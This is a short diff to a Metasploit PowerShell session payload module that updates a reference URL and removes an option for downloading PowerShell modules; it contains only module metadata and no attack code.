@@ -21,7 +21,7 @@ module MetasploitModule
           'Dave Hardy' # davehardy20
         ],
       'References'    => [
-          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit']
         ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'windows',
@@ -31,9 +31,6 @@ module MetasploitModule
       'RequiredCmd'   => 'generic',
       'Payload'       => { 'Payload' => '' }
       ))
-      register_options( [
-        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules separated by a comma to download over the web", nil ]),
-      ])
   end
 
   def generate
